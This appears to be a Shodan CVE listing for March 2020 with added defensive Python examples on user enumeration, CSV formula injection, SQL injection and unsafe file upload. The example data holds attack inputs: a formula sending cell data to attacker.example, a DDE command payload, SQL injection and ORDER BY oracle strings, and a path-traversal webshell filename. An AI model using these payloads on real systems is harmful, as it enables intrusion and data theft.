Security Vulnerabilities - CVEs Published In March 2020
ilchCMS 2.1.23 allows XSS via the index.php/partner/index Name parameter.
CVSS Score
6.1
EPSS Score
0.003
Published
2020-03-19
The _dtoa_r function of the newlib libc library, prior to version 3.3.0, performs multiple memory allocations without checking their return values. When an allocation fails, the resulting NULL pointer is dereferenced. Because newlib is mostly deployed on embedded targets, where address 0 is often a mapped region rather than an unmapped page, the dereference may corrupt memory silently instead of faulting.
CVSS Score
6.5
EPSS Score
0.004
Published
2020-03-19
qemu/qemu_driver.c in libvirt before 6.0.0 keeps holding the QEMU monitor job while a query to the guest agent is outstanding. A guest agent that never answers (for example one controlled from inside the guest) therefore blocks every other API call that needs the monitor, a denial of service (API blockage).
CVSS Score
5.7
EPSS Score
0.002
Published
2020-03-19
arxes-tolina 3.0.0 allows user enumeration: the application responds differently for existing and non-existing accounts, so an attacker can confirm which usernames are valid before attempting password guessing.
CVSS Score
4.3
EPSS Score
0.003
Published
2020-03-18
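The arxes-tolina code itself is not shown on this page. As an added example that is not the vendor's code, the following Python contrasts a login handler that leaks whether an account exists with one that returns the same message and does the same amount of work either way. The user store, credentials and message strings are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets


def hash_password(password: str, salt: bytes) -> bytes:
    """Slow salted hash; the exact KDF is not the point of the example."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user store for the example: one real account.
_ALICE_SALT = os.urandom(16)
USERS = {"alice": (_ALICE_SALT, hash_password("correct horse", _ALICE_SALT))}

# Dummy credential so that unknown usernames cost the same hashing work as real
# ones; the secret is random and never matches a submitted password in practice.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password(secrets.token_hex(16), _DUMMY_SALT)

GENERIC_FAILURE = "invalid username or password"


def login_vulnerable(username: str, password: str) -> tuple:
    """Enumerable: message (and timing) differ for unknown vs. known accounts."""
    if username not in USERS:
        return (False, "unknown user")        # reveals the account does not exist
    salt, stored = USERS[username]
    if not hmac.compare_digest(hash_password(password, salt), stored):
        return (False, "wrong password")      # reveals the account does exist
    return (True, "ok")


def login_fixed(username: str, password: str) -> tuple:
    """Uniform response: same message, same hashing work, constant-time compare."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    matches = hmac.compare_digest(hash_password(password, salt), stored)
    ok = matches and username in USERS
    return (ok, "ok" if ok else GENERIC_FAILURE)


if __name__ == "__main__":
    for handler in (login_vulnerable, login_fixed):
        print(handler.__name__, handler("alice", "nope"), handler("mallory", "nope"))
```

The same uniformity has to hold for registration and password-reset flows, and for HTTP status codes and response sizes, not only for the message text; the dummy hash is what keeps the response time independent of whether the account exists.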
A CSV injection (formula injection) in arxes-tolina 3.0.0 allows malicious users to attack the computers of other users. By entering formula code in the columns Kundennummer, Firma, Street, PLZ, Ort, Zahlziel, and Bemerkung, an attacker can create a record whose fields begin with a spreadsheet formula. When other users export this data as a CSV file and open it in a tool such as Microsoft Excel, the formula is evaluated on their machine; DDE and external-link formulas can then run commands or exfiltrate cell contents, giving the attacker remote access to the user's PC. Current spreadsheet applications show a security prompt before executing such formulas, so exploitation depends on the victim accepting it.
CVSS Score
9.6
EPSS Score
0.004
Published
2020-03-18
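As an added example (not code from arxes-tolina or from this page), the following Python shows the export-side defence for the column set named in the entry: any cell that begins with a character a spreadsheet treats as a formula trigger is prefixed with a single quote before being written, so the viewer displays it as text. The column names are taken from the entry; the records, including the attacker-controlled one, are constructed for the example.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula (tab and carriage return included, per OWASP guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Columns named in the advisory. The rows below are constructed for the example.
COLUMNS = ["Kundennummer", "Firma", "Street", "PLZ", "Ort", "Zahlziel", "Bemerkung"]

SAMPLE_ROWS = [
    {"Kundennummer": "10001", "Firma": "Muster GmbH", "Street": "Hauptstr. 1",
     "PLZ": "10115", "Ort": "Berlin", "Zahlziel": "30", "Bemerkung": "ok"},
    # An attacker-created record: every field starts with a formula trigger.
    {"Kundennummer": "=1+1",
     "Firma": "=HYPERLINK(\"https://attacker.example/?\"&A2,\"click\")",
     "Street": "+cmd", "PLZ": "-5", "Ort": "@SUM(A1:A9)", "Zahlziel": "\t=2*2",
     "Bemerkung": "=cmd|' /C calc'!A0"},
]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return bool(value) and value[0] in FORMULA_TRIGGERS


def neutralize_cell(value: str) -> str:
    """Defuse a cell for CSV export by forcing it to be read as text."""
    return "'" + value if is_formula_like(value) else value


def export_csv(rows, columns, sanitize=True) -> str:
    """Serialise rows to CSV; sanitize=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(columns)
    for row in rows:
        cells = [str(row.get(col, "")) for col in columns]
        if sanitize:
            cells = [neutralize_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def count_live_formulas(csv_text: str) -> int:
    """Count cells in a CSV document that would still be evaluated on open."""
    reader = csv.reader(io.StringIO(csv_text))
    next(reader)  # skip the header row
    return sum(1 for row in reader for cell in row if is_formula_like(cell))


if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS, COLUMNS, sanitize=False))
    print(export_csv(SAMPLE_ROWS, COLUMNS))
```

The quote prefix also alters legitimate values such as the negative number "-5", so where the schema knows a column is numeric it is better to emit it as a number; the defence has to live at export time because the formula runs on the viewer's machine, which the server never sees.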
LogicalDoc before 8.3.3 allows SQL injection. LogicalDoc populates the list of available documents by querying the database, and the list can be filtered by modifying request parameters. Some of those parameters are concatenated into the query rather than bound or validated, which allows an authenticated attacker to run arbitrary queries against the database.
CVSS Score
6.5
EPSS Score
0.004
Published
2020-03-18
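The LogicalDoc entry describes the filter-and-sort injection pattern. As an added example that is not LogicalDoc's code, here is that pattern in Python with sqlite3: a document list filtered by a value the user supplies and sorted by a column the user names. The first handler concatenates both into the SQL text; the second binds the value and allowlists the column, since identifiers cannot be bound. The table contents are constructed for the example.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory table with constructed sample documents."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE documents(id INTEGER PRIMARY KEY, title TEXT, owner TEXT, folder TEXT);
        INSERT INTO documents(title, owner, folder) VALUES
          ('Q1 report', 'alice', 'finance'),
          ('Board minutes', 'bob', 'board'),
          ('Holiday plan', 'alice', 'hr');
    """)
    return conn


# Only these identifiers may appear in ORDER BY; everything else is rejected.
ALLOWED_SORT_COLUMNS = {"id", "title", "owner", "folder"}


def list_documents_vulnerable(conn, owner: str, sort: str) -> list:
    """Filter value and sort column are pasted into the query text."""
    sql = f"SELECT title FROM documents WHERE owner = '{owner}' ORDER BY {sort}"
    return [row[0] for row in conn.execute(sql)]


def list_documents_fixed(conn, owner: str, sort: str) -> list:
    """Value is bound as a parameter; the identifier is checked against an allowlist."""
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unknown sort column: {sort!r}")
    sql = f"SELECT title FROM documents WHERE owner = ? ORDER BY {sort}"
    return [row[0] for row in conn.execute(sql, (owner,))]


def oracle_sort(guess: str) -> str:
    """A sort 'column' that leaks data through row order: if the guess about
    another user's record is right the list is ordered by id, otherwise by title."""
    return (f"(CASE WHEN (SELECT owner FROM documents WHERE id = 2) = '{guess}' "
            f"THEN id ELSE title END)")


if __name__ == "__main__":
    db = setup_db()
    print(list_documents_vulnerable(db, "x' OR 1=1 --", "id"))   # every document
    print(list_documents_fixed(db, "x' OR 1=1 --", "id"))        # nothing
    print(list_documents_vulnerable(db, "alice", oracle_sort("bob")))
```

The ORDER BY oracle is why escaping the filter value alone is not enough: the sort parameter never passes through a string literal, so quoting cannot protect it, and an allowlist of column names is the only sound fix.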
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms). As with the other jackson-databind gadget CVEs, exploitation requires polymorphic type handling to be enabled for untrusted input (for example via enableDefaultTyping()) and the gadget's library to be present on the classpath; the fix adds the class to the deserialization blocklist.
CVSS Score
8.8
EPSS Score
0.401
Published
2020-03-18
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). The same exploitation preconditions apply as for the aries.transaction.jms entry above: default typing enabled for untrusted input and caucho-quercus on the classpath.
CVSS Score
8.8
EPSS Score
0.205
Published
2020-03-18
PerlSpeak through 2.01 allows attackers to execute arbitrary OS commands, as demonstrated by its use of system and two-argument open on attacker-influenced strings. In Perl, two-argument open treats a filename that begins or ends with | as a command to run through the shell, so such an open behaves like system when the string is controlled by the attacker.
CVSS Score
9.8
EPSS Score
0.005
Published
2020-03-18
LogicalDoc before 8.3.3 allows an attacker to upload arbitrary files, leading to command execution or retrieval of data from the database. LogicalDoc provides functionality to add documents, which can then be versioned, shared among users, tagged, and so on. An unauthenticated attacker can abuse this functionality to write an arbitrary file into a restricted folder, which leads to execution of malicious commands with root privileges.
CVSS Score
9.8
EPSS Score
0.015
Published
2020-03-18
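The entry does not say how the upload path is built, so the following is an added example of the general pattern rather than LogicalDoc's code: an upload handler that joins the client-supplied name onto the storage root (so "../" picks the folder and the extension is never checked), beside one that allowlists the extension, discards the client's name, and verifies the resolved path is still under the root. The upload root, file names and contents are constructed for the example.

```python
import os
import secrets
import tempfile

# Extensions the document store accepts; nothing the web server would execute.
ALLOWED_EXTENSIONS = {".pdf", ".txt", ".docx", ".png"}


def validate_upload_name(client_filename: str) -> str:
    """Return the lower-cased extension if the client-supplied name is acceptable."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if base in ("", ".", "..") or ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"rejected upload name: {client_filename!r}")
    return ext


def escapes_root(upload_root: str, path: str) -> bool:
    """True if path resolves outside upload_root once '..' and symlinks are resolved."""
    root = os.path.realpath(upload_root)
    return os.path.commonpath([root, os.path.realpath(path)]) != root


def store_upload_vulnerable(upload_root: str, client_filename: str, data: bytes) -> str:
    # Vulnerable pattern: the client name chooses both directory and extension.
    dest = os.path.join(upload_root, client_filename)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def store_upload_fixed(upload_root: str, client_filename: str, data: bytes) -> str:
    # Hardened: allowlisted extension, server-chosen random name, containment check.
    ext = validate_upload_name(client_filename)
    dest = os.path.join(upload_root, secrets.token_hex(16) + ext)
    if escapes_root(upload_root, dest):
        raise ValueError("destination resolves outside the upload root")
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def run_demo() -> dict:
    """Exercise both handlers in a throwaway directory tree and report the outcome."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "uploads")
        os.makedirs(root)
        evil = "../webroot/shell.jsp"          # constructed traversal + executable name
        path = store_upload_vulnerable(root, evil, b"not really a webshell")
        results["vulnerable_escaped_root"] = escapes_root(root, path)
        try:
            store_upload_fixed(root, evil, b"not really a webshell")
            results["fixed_rejected_jsp"] = False
        except ValueError:
            results["fixed_rejected_jsp"] = True
        path = store_upload_fixed(root, "../../report.pdf", b"%PDF-1.4")
        results["fixed_stayed_in_root"] = not escapes_root(root, path)
        results["fixed_renamed"] = os.path.basename(path) != "report.pdf"
    return results


if __name__ == "__main__":
    print(run_demo())
```

Keeping the upload root outside the web server's document root, and serving stored files through a handler that sets Content-Disposition rather than by path, removes the remaining ways an accepted file could be executed.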


Shodan ® - All rights reserved